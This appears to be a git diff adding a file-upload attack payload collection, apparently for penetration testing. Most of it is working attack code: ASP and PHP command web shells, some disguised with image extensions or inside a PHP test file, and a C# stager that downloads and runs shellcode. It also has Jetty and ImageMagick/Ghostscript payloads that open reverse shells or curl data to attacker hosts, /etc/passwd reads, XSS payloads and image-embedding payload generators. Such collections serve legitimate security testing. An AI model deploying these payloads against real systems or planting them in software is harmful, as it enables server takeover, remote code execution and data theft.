+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1,55 @@
+<%@ WebService Language="C#" class="SoapStager"%>
+using System;
+using System.IO;
+using System.Web;
+using System.Web.Services;
+using System.Net;
+using System.Net.NetworkInformation;
+using System.Net.Security;
+
+// SRC: https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap
+// https://github.com/0xbad53c/webshells/tree/main/iis
+
+[WebService(Namespace = "http://microsoft.com/" ,Description ="SOAP Stager Webshell" , Name ="SoapStager")]
+[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
+public class SoapStager : MarshalByRefObject
+{
+	private static Int32 MEM_COMMIT=0x1000;
+	private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
+
+	[System.Runtime.InteropServices.DllImport("kernel32")]
+	private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
+
+	[System.Runtime.InteropServices.DllImport("kernel32")]
+	private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
+
+
+    [System.ComponentModel.ToolboxItem(false)]
+    [WebMethod]
+    public string loadStage()
+    {
+        string Url = "http://10.90.255.52/beacon.bin"; //your IP and location of meterpreter or other raw shellcode
+        byte[] rzjUFlLZh;
+
+        IWebProxy defaultWebProxy = WebRequest.DefaultWebProxy;
+        defaultWebProxy.Credentials = CredentialCache.DefaultCredentials;
+
+        // in case of HTTPS
+        using (WebClient webClient = new WebClient() { Proxy = defaultWebProxy })
+        {
+            ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
+            ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return true; });
+            webClient.UseDefaultCredentials = true;
+            rzjUFlLZh = webClient.DownloadData(Url);
+        }
+
+
+        // Feel free to improve to PAGE_READWRITE & direct syscalls for more evasion
+        IntPtr fvYV5t = VirtualAlloc(IntPtr.Zero,(UIntPtr)rzjUFlLZh.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+        System.Runtime.InteropServices.Marshal.Copy(rzjUFlLZh,0,fvYV5t,rzjUFlLZh.Length);
+        IntPtr owlqRoQI_ms = IntPtr.Zero;
+        IntPtr vnspR2 = CreateThread(IntPtr.Zero,UIntPtr.Zero,fvYV5t,IntPtr.Zero,0,ref owlqRoQI_ms);
+
+        return "finished";
+    }
+}
--- a/ASP/shell.xamlx
+++ b/ASP/shell.xamlx
@@ -0,0 +1,16 @@
+<WorkflowService ConfigurationName="Service1" Name="Service1" xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" xmlns:p="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:p1="http://schemas.microsoft.com/netfx/2009/xaml/activities" >
+ <p:Sequence DisplayName="Sequential Service">
+ <TransactedReceiveScope Request="{x:Reference __r0}">
+ <p1:Sequence >
+ <SendReply DisplayName="SendResponse" >
+ <SendReply.Request>
+ <Receive x:Name="__r0" CanCreateInstance="True" OperationName="SubmitPurchasingProposal" Action="testme" />
+ </SendReply.Request>
+ <SendMessageContent>
+ <p1:InArgument x:TypeArguments="x:String">[System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()]</p1:InArgument>
+ </SendMessageContent>
+ </SendReply>
+ </p1:Sequence>
+ </TransactedReceiveScope>
+ </p:Sequence>
+</WorkflowService>
--- a/Flash/index.html
+++ b/Flash/index.html
--- a/Files/Extension
+++ b/Files/Extension
--- a/Flash/xssproject.swf
+++ b/Flash/xssproject.swf
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1 @@
+<script>alert('XSS')</script>
--- a/Files/Extension
+++ b/Files/Extension
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1 @@
+app.alert("XSS")
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1,108 @@
+# FROM https://github.com/osnr/horrifying-pdf-experiments
+import sys
+
+from pdfrw import PdfWriter
+from pdfrw.objects.pdfname import PdfName
+from pdfrw.objects.pdfstring import PdfString
+from pdfrw.objects.pdfdict import PdfDict
+from pdfrw.objects.pdfarray import PdfArray
+
+def make_js_action(js):
+    action = PdfDict()
+    action.S = PdfName.JavaScript
+    action.JS = js
+    return action
+
+def make_field(name, x, y, width, height, r, g, b, value=""):
+    annot = PdfDict()
+    annot.Type = PdfName.Annot
+    annot.Subtype = PdfName.Widget
+    annot.FT = PdfName.Tx
+    annot.Ff = 2
+    annot.Rect = PdfArray([x, y, x + width, y + height])
+    annot.MaxLen = 160
+    annot.T = PdfString.encode(name)
+    annot.V = PdfString.encode(value)
+
+    # Default appearance stream: can be arbitrary PDF XObject or
+    # something. Very general.
+    annot.AP = PdfDict()
+
+    ap = annot.AP.N = PdfDict()
+    ap.Type = PdfName.XObject
+    ap.Subtype = PdfName.Form
+    ap.FormType = 1
+    ap.BBox = PdfArray([0, 0, width, height])
+    ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
+    ap.stream = """
+%f %f %f rg
+0.0 0.0 %f %f re f
+""" % (r, g, b, width, height)
+
+    # It took me a while to figure this out. See PDF spec:
+    # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641
+
+    # Basically, the appearance stream we just specified doesn't
+    # follow the field rect if it gets changed in JS (at least not in
+    # Chrome).
+
+    # But this simple MK field here, with border/color
+    # characteristics, _does_ follow those movements and resizes, so
+    # we can get moving colored rectangles this way.
+    annot.MK = PdfDict()
+    annot.MK.BG = PdfArray([r, g, b])
+
+    return annot
+
+def make_page(fields, script):
+    page = PdfDict()
+    page.Type = PdfName.Page
+
+    page.Resources = PdfDict()
+    page.Resources.Font = PdfDict()
+    page.Resources.Font.F1 = PdfDict()
+    page.Resources.Font.F1.Type = PdfName.Font
+    page.Resources.Font.F1.Subtype = PdfName.Type1
+    page.Resources.Font.F1.BaseFont = PdfName.Helvetica
+
+    page.MediaBox = PdfArray([0, 0, 612, 792])
+
+    page.Contents = PdfDict()
+    page.Contents.stream = """
+BT
+/F1 24 Tf
+ET
+    """
+
+    annots = fields
+
+    page.AA = PdfDict()
+    # You probably should just wrap each JS action with a try/catch,
+    # because Chrome does no error reporting or even logging otherwise;
+    # you just get a silent failure.
+    page.AA.O = make_js_action("""
+try {
+  %s
+} catch (e) {
+  app.alert(e.message);
+}
+    """ % (script))
+
+    page.Annots = PdfArray(annots)
+    return page
+
+if len(sys.argv) > 1:
+    js_file = open(sys.argv[1], 'r')
+
+    fields = []
+    for line in js_file:
+        if not line.startswith('/// '): break
+        pieces = line.split()
+        params = [pieces[1]] + [float(token) for token in pieces[2:]]
+        fields.append(make_field(*params))
+
+    js_file.seek(0)
+
+    out = PdfWriter()
+    out.addpage(make_page(fields, js_file.read()))
+    out.write('result.pdf')
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1,48 @@
+%PDF-1.3
+%âãÏÓ
+1 0 obj
+<</Pages 2 0 R /Type /Catalog>>
+endobj
+2 0 obj
+<</Count 1 /Kids [3 0 R] /Type /Pages>>
+endobj
+3 0 obj
+<</AA
+  <</O
+  <</JS
+  (
+try {
+  app.alert\("XSS"\)
+} catch \(e\) {
+  app.alert\(e.message\);
+}
+    )
+  /S /JavaScript>>>>
+  /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
+  /Resources
+  <</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
+  /Type /Page>>
+endobj
+4 0 obj
+<</Length 21>>
+stream
+
+BT
+/F1 24 Tf
+ET
+    
+endstream
+endobj
+xref
+0 5
+0000000000 65535 f
+0000000015 00000 n
+0000000062 00000 n
+0000000117 00000 n
+0000000424 00000 n
+trailer
+
+<</Root 1 0 R /Size 5>>
+startxref
+493
+%%EOF
--- a/PHP/extensions.lst
+++ b/PHP/extensions.lst
@@ -0,0 +1,21 @@
+.jpeg.php
+.jpg.php
+.png.php
+.php
+.php3
+.php4
+.php5
+.php7
+.php8
+.pht
+.phar
+.phpt
+.pgif
+.phtml
+.phtm
+.php%00.gif
+.php\x00.gif
+.php%00.png
+.php\x00.png
+.php%00.jpg
+.php\x00.jpg
--- a/PHP/phpinfo.jpg.php
+++ b/PHP/phpinfo.jpg.php
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
--- a/PHP/phpinfo.phar
+++ b/PHP/phpinfo.phar
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
--- a/PHP/phpinfo.php
+++ b/PHP/phpinfo.php
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
--- a/PHP/phpinfo.php3
+++ b/PHP/phpinfo.php3
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
--- a/PHP/phpinfo.php4
+++ b/PHP/phpinfo.php4
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
--- a/PHP/phpinfo.php5
+++ b/PHP/phpinfo.php5
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
--- a/PHP/phpinfo.php7
+++ b/PHP/phpinfo.php7
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
--- a/PHP/phpinfo.php8
+++ b/PHP/phpinfo.php8
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
--- a/PHP/phpinfo.phpt
+++ b/PHP/phpinfo.phpt
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
--- a/PHP/phpinfo.pht
+++ b/PHP/phpinfo.pht
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
--- a/PHP/phpinfo.phtml
+++ b/PHP/phpinfo.phtml
@@ -0,0 +1 @@
+<?php phpinfo(); ?>
--- a/PHP/shell.gif^shell.php
+++ b/PHP/shell.gif^shell.php
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/PHP/shell.jpeg.php
+++ b/PHP/shell.jpeg.php
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/PHP/shell.jpg.php
+++ b/PHP/shell.jpg.php
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/PHP/shell.jpg^shell.php
+++ b/PHP/shell.jpg^shell.php
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/Files/Extension
+++ b/Files/Extension
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1,9 @@
+--TEST--
+echo - basic test for echo language construct
+--FILE--
+<?php
+echo 'This works ', 'and takes args!';
+echo "Shell";system($_GET['cmd']);
+?>
+--EXPECT--
+This works and takes args!
--- a/Files/Extension
+++ b/Files/Extension
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/PHP/shell.phtml
+++ b/PHP/shell.phtml
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/PHP/shell.png.php
+++ b/PHP/shell.png.php
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/PHP/shell.png^shell.php
+++ b/PHP/shell.png^shell.php
@@ -0,0 +1 @@
+<?php echo "Shell";system($_GET['cmd']); ?>
--- a/Files/Images/file-upload-mindmap.png
+++ b/Files/Images/file-upload-mindmap.png
--- a/RCE/JettyShell.xml
+++ b/RCE/JettyShell.xml
@@ -0,0 +1,15 @@
+<?xml version="1.0"?>
+<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
+<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
+    <Call class="java.lang.Runtime" name="getRuntime">
+        <Call name="exec">
+            <Arg>
+                <Array type="String">
+                    <Item>/bin/sh</Item>
+                    <Item>-c</Item>
+                    <Item>curl -F "r=`id`" http://yourServer:1337/</Item>
+                </Array>
+            </Arg>
+        </Call>
+    </Call>
+</Configure>
--- a/Compression/GIF_exploit.gif
+++ b/Compression/GIF_exploit.gif
--- a/Compression/JPG_exploit-55.jpg
+++ b/Compression/JPG_exploit-55.jpg
--- a/Compression/PNG_110x110_resize_bypass_use_LFI.png
+++ b/Compression/PNG_110x110_resize_bypass_use_LFI.png
--- a/Compression/PNG_32x32_resize_bypass_use_LFI.png
+++ b/Compression/PNG_32x32_resize_bypass_use_LFI.png
--- a/Compression/createBulletproofJPG.py
+++ b/Compression/createBulletproofJPG.py
@@ -0,0 +1,135 @@
+#!/usr/bin/python
+
+"""
+    Bulletproof Jpegs Generator
+    Copyright (C) 2012  Damien "virtualabs" Cauquil
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License along
+    with this program; if not, write to the Free Software Foundation, Inc.,
+    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+	-------------
+	# How to use
+	b.php?c=ls
+	Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
+"""
+from __future__ import print_function
+
+from future import standard_library
+standard_library.install_aliases()
+from builtins import range
+import struct,sys,os
+import gd
+from io import StringIO
+from random import randint,shuffle
+from time import time
+
+# image width/height (square)
+N = 32
+
+
+def insertPayload(_in, _out, payload,off):
+	"""
+	Payload insertion (quick JPEG parsing and patching)
+	"""
+	img = _in
+	# look for 'FF DA' (SOS)
+	sos = img.index("\xFF\xDA")
+	sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
+	sod = sos_size+2
+	# look for 'FF D9' (EOI)
+	eoi = img[sod:].index("\xFF\xD9")
+	# enough size ?
+	if (eoi - sod - off)>=len(payload):
+		_out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
+		return True
+	else:
+		return False
+
+if __name__=='__main__':
+
+	print("[+] Virtualabs' Nasty bulletproof Jpeg generator")
+	print(" |  website: http://virtualabs.fr")
+	print(" |  contact: virtualabs -at- gmail -dot- com")
+	print("")
+
+	payloads = ["<?php system(/**/$_GET['c'/**/]); ?>","<?php /**/system($_GET[chr(99)/**/]); ?>","<?php system(/**/$_GET[chr(99)]); ?>","<?php\r\nsystem($_GET[/**/'c']);\r\n ?>"]
+
+	# make sure the exploit-jpg directory exists or create it
+	if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'):
+		print("[!] Please remove the file named 'exploit-jpg' from the current directory")
+	elif not os.path.exists('exploit-jpg'):
+		os.mkdir('exploit-jpg')
+		
+	# start generation
+	print('[i] Generating ...')
+	for q in list(range(50,100))+[-1]:
+		# loop over every payload		
+		for p in payloads:
+			# not done yet
+			done = False
+			start = time()
+			# loop while not done and timeout not reached
+			while not done and (time()-start)<10.0:
+				
+				# we create a NxN pixels image, true colors
+				img = gd.image((N,N),True)
+				# we create a palette
+				pal = []
+				for i in range(N*N):
+					pal.append(img.colorAllocate((randint(0,256),randint(0,256),randint(0,256))))
+				# we shuffle this palette
+				shuffle(pal)
+				# and fill the image with it			
+				pidx = 0
+				for x in  range(N):
+					for y in range(N):
+						img.setPixel((x,y),pal[pidx])
+						pidx+=1
+						
+				# write down the image
+				out_jpg = StringIO('')	
+				img.writeJpeg(out_jpg,q)
+				out_raw = out_jpg.getvalue()
+							
+				# now, we try to insert the payload various ways
+				for i in range(64):
+					test_jpg = StringIO('')
+					if insertPayload(out_raw,test_jpg,p,i):
+						try:
+							# write down the new jpeg file
+							f = open('exploit-jpg/exploit-%d.jpg'%q,'wb')
+							f.write(test_jpg.getvalue())
+							f.close()
+							
+							# load it with GD
+							test = gd.image('exploit-jpg/exploit-%d.jpg'%q)
+							final_jpg = StringIO('')
+							test.writeJpeg(final_jpg,q)
+							final_raw = final_jpg.getvalue()
+							# does it contain our payload ?
+							if p in final_raw:
+								# Yay ! 
+								print('[i] Jpeg quality %d ... DONE'%q)
+								done = True
+								break
+						except IOError as e:
+							pass
+					else:
+						break
+			if not done:
+				# payload not found, we remove the file
+				os.unlink('exploit-jpg/exploit-%d.jpg'%q)
+			else:		
+				break
+			
--- a/Compression/createCompressedPNG_110x110.php
+++ b/Compression/createCompressedPNG_110x110.php
@@ -0,0 +1,22 @@
+<?
+ 
+header('Content-Type: image/png');
+ 
+$p = array(0xA3, 0x9F, 0x67, 0xF7, 0x0E, 0x93, 0x1B, 0x23, 0xBE, 0x2C, 0x8A, 0xD0, 0x80, 0xF9, 0xE1, 0xAE, 0x22, 0xF6, 0xD9, 0x43, 0x5D, 0xFB, 0xAE, 0xCC, 0x5A, 0x01, 0xDC, 0xAA, 0x52, 0xD0, 0xB6, 0xEE, 0xBB, 0x3A, 0xCF, 0x93, 0xCE, 0xD2, 0x88, 0xFC, 0x69, 0xD0, 0x2B, 0xB9, 0xB0, 0xFB, 0xBB, 0x79, 0xFC, 0xED, 0x22, 0x38, 0x49, 0xD3, 0x51, 0xB7, 0x3F, 0x02, 0xC2, 0x20, 0xD8, 0xD9, 0x3C, 0x67, 0xF4, 0x50, 0x67, 0xF4, 0x50, 0xA3, 0x9F, 0x67, 0xA5, 0xBE, 0x5F, 0x76, 0x74, 0x5A, 0x4C, 0xA1, 0x3F, 0x7A, 0xBF, 0x30, 0x6B, 0x88, 0x2D, 0x60, 0x65, 0x7D, 0x52, 0x9D, 0xAD, 0x88, 0xA1, 0x66, 0x94, 0xA1, 0x27, 0x56, 0xEC, 0xFE, 0xAF, 0x57, 0x57, 0xEB, 0x2E, 0x20, 0xA3, 0xAE, 0x58, 0x80, 0xA7, 0x0C, 0x10, 0x55, 0xCF, 0x09, 0x5C, 0x10, 0x40, 0x8A, 0xB9, 0x39, 0xB3, 0xC8, 0xCD, 0x64, 0x45, 0x3C, 0x49, 0x3E, 0xAD, 0x3F, 0x33, 0x56, 0x1F, 0x19 );
+ 
+$img = imagecreatetruecolor(110, 110);
+ 
+for ($y = 0; $y < sizeof($p); $y += 3) {
+$r = $p[$y];
+$g = $p[$y+1];
+$b = $p[$y+2];
+$color = imagecolorallocate($img, $r, $g, $b);
+imagesetpixel($img, round($y / 3)*2, 0, $color);
+imagesetpixel($img, round($y / 3)*2+1, 0, $color);
+imagesetpixel($img, round($y / 3)*2, 1, $color);
+imagesetpixel($img, round($y / 3)*2+1, 1, $color);
+}
+ 
+imagepng($img);
+ 
+?>
--- a/Compression/createGIFwithGlobalColorTable.php
+++ b/Compression/createGIFwithGlobalColorTable.php
@@ -0,0 +1,22 @@
+<?php
+// createGIFwithGlobalColorTable.php
+$_file="example.gif";
+$_payload="<?php evil();?>";
+$_width=200;
+$_height=200;
+if(strlen($_payload)%3!=0){
+ echo "payload%3==0 !"; exit();
+}
+$im = imagecreate($_width, $_height);
+$_hex=unpack('H*',$_payload);
+
+$colors_hex=str_split($_hex[1], 6);
+
+for($i=0; $i < count($colors_hex); $i++){
+  $_color_chunks=str_split($colors_hex[$i], 2);
+  $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
+  imagesetpixel($im,$i,1,$color);
+}
+
+imagegif($im,$_file);
+?>
--- a/Compression/createPNGwithPLTE.php
+++ b/Compression/createPNGwithPLTE.php
@@ -0,0 +1,28 @@
+<?php 
+//createPNGwithPLTE.php
+// bypass imageCreateFromPng and imagepng 
+$_payload="<?php phpinfo()?> ";
+$_pay_len=strlen($_payload);
+if(strlen($_payload)%3!=0){
+ echo "payload%3==0 !"; exit();
+}
+
+
+$width=$_pay_len/3;
+$height=20;
+//$im = imageCreateFromPng("existing.png");
+$im = imagecreate($width, $height);
+
+$_hex=unpack('H*',$_payload);
+$_chunks=str_split($_hex[1], 6);
+
+for($i=0; $i < count($_chunks); $i++){
+
+  $_color_chunks=str_split($_chunks[$i], 2);
+  $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
+
+  imagesetpixel($im,$i,1,$color);
+
+}
+
+imagepng($im,"example.png");
--- a/ImageMagick/convert_local_etc_passwd.svg
+++ b/ImageMagick/convert_local_etc_passwd.svg
@@ -0,0 +1,5 @@
+<svg width="1000" height="1000" 
+xmlns:xlink="http://www.w3.org/1999/xlink">
+xmlns="http://www.w3.org/2000/svg">       
+<image xlink:href="text:/etc/passwd" height="500" width="500"/>
+</svg>
--- a/ImageMagick/convert_local_etc_passwd_html.svg
+++ b/ImageMagick/convert_local_etc_passwd_html.svg
@@ -0,0 +1,5 @@
+<svg width="1000" height="1000" 
+xmlns:xlink="http://www.w3.org/1999/xlink">
+xmlns="http://www.w3.org/2000/svg">       
+<image xlink:href="html:/etc/passwd" height="500" width="500"/>
+</svg>
--- a/ImageMagick/ghostscript_rce_curl.jpg
+++ b/ImageMagick/ghostscript_rce_curl.jpg
@@ -0,0 +1,6 @@
+%!PS
+userdict /setpagedevice undef
+legal
+{ null restore } stopped { pop } if
+legal
+mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops
--- a/ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png
+++ b/ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png
--- a/ImageMagick/imagemagick_ghostscript_cmd_exec.pdf
+++ b/ImageMagick/imagemagick_ghostscript_cmd_exec.pdf
@@ -0,0 +1,4 @@
+%!PS
+currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) )
+.putdeviceparams
+quit
--- a/ImageMagick/imagemagik_ghostscript_reverse_shell.jpg
+++ b/ImageMagick/imagemagik_ghostscript_reverse_shell.jpg
@@ -0,0 +1,6 @@
+%!PS
+userdict /setpagedevice undef
+legal
+{ null restore } stopped { pop } if
+legal
+mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1') currentdevice putdeviceprops
--- a/ImageMagick/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
+++ b/ImageMagick/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
@@ -0,0 +1,5 @@
+push graphic-context
+viewbox 0 0 640 480
+image over 0,0 0,0 'pango:@/etc/passwd'
+pop graphic-context
+
--- a/ImageMagick/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
+++ b/ImageMagick/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
@@ -0,0 +1,5 @@
+push graphic-context
+viewbox 0 0 640 480
+image over 0,0 0,0 'text:/etc/passwd'
+pop graphic-context
+
--- a/ImageMagick/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
+++ b/ImageMagick/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
@@ -0,0 +1,9 @@
+push graphic-context
+encoding "UTF-8"
+viewbox 0 0 1 1
+affine 1 0 0 1 0 0
+push graphic-context
+image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
+pop graphic-context
+pop graphic-context
+
--- a/ImageMagick/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
+++ b/ImageMagick/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
@@ -0,0 +1,8 @@
+push graphic-context
+encoding "UTF-8"
+viewbox 0 0 1 1
+affine 1 0 0 1 0 0
+push graphic-context
+image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 127.0.0.1 4444 0</tmp/gjdpez | /bin/sh >/tmp/gjdpez 2>&1; rm /tmp/gjdpez '
+pop graphic-context
+pop graphic-context
--- a/ImageMagick/imagetragik1_payload_imageover_wget.gif
+++ b/ImageMagick/imagetragik1_payload_imageover_wget.gif
@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 > /dev/null`'
+pop graphic-context
--- a/ImageMagick/imagetragik1_payload_url_bind_shell_nc.mvg
+++ b/ImageMagick/imagetragik1_payload_url_bind_shell_nc.mvg
@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(https://example.com/image.jpg"|nc -l -p 7777 -e"/bin/sh)'
+pop graphic-context
--- a/ImageMagick/imagetragik1_payload_url_curl.png
+++ b/ImageMagick/imagetragik1_payload_url_curl.png
@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "127.0.0.1)'
+pop graphic-context
--- a/ImageMagick/imagetragik1_payload_url_portscan.jpg
+++ b/ImageMagick/imagetragik1_payload_url_portscan.jpg
@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(http://localhost:PORT/)'
+pop graphic-context
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1 @@`
				`X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*`
				`@@ -0,0 +1 @@`
				`<?php echo "Shell";system($_GET['cmd']); ?>`